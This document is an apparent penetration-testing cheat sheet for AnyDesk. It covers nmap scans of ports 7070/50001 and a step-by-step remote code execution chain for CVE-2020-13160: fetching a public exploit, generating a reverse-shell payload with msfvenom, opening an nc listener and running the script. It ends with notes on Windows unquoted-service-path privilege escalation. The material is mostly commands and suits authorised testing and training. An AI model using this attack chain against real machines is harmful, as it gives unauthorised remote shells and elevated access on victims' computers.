AnyDesk – port 7070 (TCP) / 50001 (UDP)

AnyDesk is a proprietary remote desktop application distributed by AnyDesk Software GmbH that provides platform independent remote access to personal computers and other devices running the host application.

❗ AnyDesk is frequently used by scammers. It offers remote control, file transfer, and VPN functionality.

Nmap sweep for AnyDesk

IP=x.x.x.1-254

sudo nmap -Pn -sT -sC -sV -p 7070 -T5 --open $IP

sudo nmap -Pn -sU -sC -sV -p 50001 -T5 --open $IP

Exploits

searchsploit anydesk

AnyDesk 5.5.2 – Remote Code Execution (CVE-2020-13160)

searchsploit -m 49613

Generate the shellcode

💡 Depending on firewall rules, might need to use a port that is allowed, like the 7070 (allowed for AnyDesk) instead of 4444 like suggested in the exploit.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI_IP LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode

• Edit IP address to victim host. Leave port 50001 as it is default UDP port for AnyDesk.
• Replace generated shellcode in the exploit.

Start a listener

nc -nlvp 4444

Execute the exploit

./49613.py

Should get a shell within 5 seconds according to the exploit.

Privilege Escalation (Windows)

• AnyDesk 5.4.0 – Unquoted Service Path
• AnyDesk 2.5.0 – Unquoted Service Path Privilege Escalation

sc query AnyDesk

sc qc anydesk

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

Not tested, but the only option seems to be:

C:\Program.exe

See Windows Unquoted Service Path. Could require a reboot if service cannot be restarted.